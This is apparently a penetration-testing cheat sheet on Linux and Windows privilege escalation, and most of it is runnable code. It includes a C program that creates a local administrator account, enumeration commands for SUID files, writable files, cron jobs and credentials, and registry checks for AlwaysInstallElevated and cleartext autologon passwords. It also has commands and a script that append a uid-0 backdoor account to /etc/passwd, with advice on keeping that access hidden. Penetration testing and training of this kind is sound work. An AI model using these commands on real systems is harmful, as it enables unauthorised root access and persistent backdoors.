Privilege Escalation¶
Privilege escalation means gaining higher levels of access or permissions within a system or network beyond what was initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges from a lower-privileged user or account to gain control over more sensitive resources or execute commands with increased authority.
Linux Privilege Escalation¶
- sudo -l
- Kernel Exploits
- OS Exploits
- Password reuse (mysql, .bash_history, 000-default.conf...)
- Known SUID binaries with an interactive or shell-escape mode (e.g. nmap --interactive)
- Custom SUID binaries that call other programs by relative name (PATH hijacking) or execute user-controlled commands
- Writable files owned by root that get executed (cronjobs)
- MySQL as root
- Vulnerable services (chkrootkit, logrotate)
- Writable /etc/passwd
- Readable .bash_history
- SSH private key
- Listening ports on localhost
- /etc/fstab
- /etc/exports
- /var/mail
- Process as other user (root) executing something you have permissions to modify
- SSH public key + Predictable PRNG
- apt update hooking (Pre-Invoke)
- Capabilities
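As an added, runnable illustration of the cron item above (this is not code from the original page): the script below parses system-crontab lines, which use the `m h dom mon dow user command` layout of /etc/crontab and /etc/cron.d/* (per-user crontabs have no user field and are not handled), extracts the first absolute path in each command and reports the ones the current user can write to or replace. The file names in the comments and usage line are hypothetical.

```sh
#!/bin/sh
# cron_audit.sh: added example for the "writable files owned by root that get
# executed (cronjobs)" check. Not part of the original page.

# Print the first absolute path in one system-crontab line. Prints nothing for
# blank lines, comments, VAR=value lines and lines without an absolute path.
cron_cmd_path() {
    set -f                 # no globbing while splitting: schedule fields contain '*'
    set -- $1
    set +f
    [ $# -gt 0 ] || return 0
    case $1 in
        '#'*)          return 0 ;;                     # comment
        [A-Za-z_]*=*)  return 0 ;;                     # MAILTO=..., PATH=... and similar
        @*)            [ $# -gt 2 ] || return 0; shift 2 ;;   # @reboot user command
        *)             [ $# -gt 6 ] || return 0; shift 6 ;;   # m h dom mon dow user command
    esac
    for _tok; do
        case $_tok in
            /?*) printf '%s\n' "$_tok"; return 0 ;;    # first token that looks like an absolute path
        esac
    done
    return 0
}

# Read a crontab file and print each scheduled absolute path that the current
# user can write to, or whose directory the current user can write to (a file
# there can be replaced, or simply created if it does not exist yet).
writable_cron_targets() {
    while IFS= read -r _line || [ -n "$_line" ]; do
        _p=$(cron_cmd_path "$_line")
        [ -n "$_p" ] || continue
        _d=${_p%/*}
        [ -n "$_d" ] || _d=/
        if [ -w "$_p" ]; then
            printf '%s writable\n' "$_p"
        elif [ -w "$_d" ]; then
            printf '%s parent directory writable\n' "$_p"
        fi
    done < "$1"
}

# Usage: sh cron_audit.sh /etc/crontab   (run without an argument it only defines the functions)
[ $# -eq 0 ] || writable_cron_targets "$1"
```

Run it against /etc/crontab and each file in /etc/cron.d; anything it reports that runs as root is a direct path to a root shell, since cron executes whatever is in the file on the next schedule.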
Windows Privilege Escalation¶
- Kernel Exploits
- OS Exploits
- Pass The Hash
- Password reuse
- DLL hijacking (Path)
- Vulnerable services
- Writable service binary paths
- Unquoted service paths
- Listening ports on localhost
- Registry keys
Kernel Exploits¶
Linux: https://github.com/lucyoa/kernel-exploits
Windows: https://github.com/abatchy17/WindowsExploits
Windows Add User
```c
#include <stdio.h>
#include <stdlib.h>   /* system, EXIT_SUCCESS, EXIT_FAILURE */

/* Build with MinGW or MSVC and run in the context the exploit gives you
   (typically SYSTEM). Username and password are taken from the command line. */
int main(int argc, char *argv[])
{
    char cmd[256];
    if (argc != 3) {
        fprintf(stderr, "usage: %s <username> <password>\n", argv[0]);
        return EXIT_FAILURE;
    }
    snprintf(cmd, sizeof cmd,
             "net user %s %s /add && net localgroup administrators %s /add",
             argv[1], argv[2], argv[1]);
    return system(cmd) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```
SUID Change
Privilege Escalation:
```bash
# SUID: file runs as its owner (usually root)
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 2>/dev/null
find / -user root -perm -4000 -exec ls -ld {} \; 2>/dev/null
# SGID: file runs as its group
find / -perm -g=s -type f 2>/dev/null
# Sticky-bit directories (shared directories such as /tmp; only the owner can delete entries)
find / -perm -1000 -type d 2>/dev/null
# Files writable by the current user (not necessarily world-writable)
find / -writable -type f 2>/dev/null
# World-writable directories, pruning /home/homedir* and dropping root-owned entries
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
# World-writable files, pruning /home/homedir/* and /proc
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
# Writable config files
find /etc/ -writable -type f 2>/dev/null
```
Window Exploit Suggester
```bash
# systeminfo.txt is the output of `systeminfo` on the target; the mssb.xls bulletin
# database is fetched with `windows-exploit-suggester.py --update`
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls
```
Windows Priv Escalation
AlwaysInstallElevated
Check whether both of the following registry values are set to "1". The setting is only exploitable when it is enabled under HKCU and HKLM together; any .msi package you run then installs as SYSTEM. The Winlogon query is a separate check for autologon credentials stored in cleartext.
```cmd
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
```
Basic Linux Enumeration
```bash
# Distribution type and kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

# Default writable directories
/tmp
/dev/shm

# Search for passwords, e.g. inside config.php
grep -R 'password' config.php

# Find other writable directories
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \; 2>/dev/null

# Services running as root
ps aux | grep root
ps -ef | grep root

# Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives
ls -lah /var/cache/yum/

# Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

# Find a pattern in a file
grep -rnw '/etc/passwd' -e 'root'

# Sticky bit, SGID, SUID
find / -perm -1000 -type d 2>/dev/null                 # sticky bit
find / -perm -g=s -type f 2>/dev/null                  # SGID (chmod 2000)
find / -perm -u=s -type f 2>/dev/null                  # SUID (chmod 4000)
find /* -user root -perm -4000 -print 2>/dev/null
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null   # SUID or SGID (parentheses needed: -a binds tighter than -o)

# Add a uid-0 user with an empty password field to /etc/passwd (works when the file is writable)
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
```
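An added example for the writable /etc/passwd case (not code from the original page): `uid0_accounts` lists every account in a passwd-format file with uid 0 and how its password is stored, which both confirms the append above worked and reveals backdoors left by others; `make_root_entry` builds the line to append, either with an empty password field as in the hodor line or, when a password is given, with a SHA-512 crypt hash generated by `openssl passwd -6`. The user names and passwords in the comments are hypothetical.

```sh
#!/bin/sh
# passwd_audit.sh: added example for the "Writable /etc/passwd" item. Not part of the original page.

# List accounts with uid 0 in the passwd file $1 and how each stores its password.
# An empty second field means `su <user>` asks for no password at all.
uid0_accounts() {
    while IFS=: read -r _user _pw _uid _gid _rest; do
        [ "$_uid" = 0 ] || continue
        if [ -z "$_pw" ]; then
            _how="empty password field"
        elif [ "$_pw" = x ]; then
            _how="password in /etc/shadow"
        else
            _how="hash stored in passwd"
        fi
        printf '%s %s\n' "$_user" "$_how"
    done < "$1"
}

# Print a uid-0 passwd line for user $1. With a non-empty $2 the password is hashed
# and stored in the entry itself, so the account works even though the other accounts
# keep their hashes in /etc/shadow. With an empty $2 the field is left blank (no password).
make_root_entry() {
    if [ -n "$2" ]; then
        _hash=$(printf '%s\n' "$2" | openssl passwd -6 -stdin) || return 1
    else
        _hash=
    fi
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$_hash"
}

# Typical use on a target (hypothetical credentials):
#   [ -w /etc/passwd ] && make_root_entry hodor 'S3cret' >> /etc/passwd && su hodor
```

Prefer the hashed form on anything you intend to keep access to: an empty password field is visible to every user on the box with a glance at /etc/passwd.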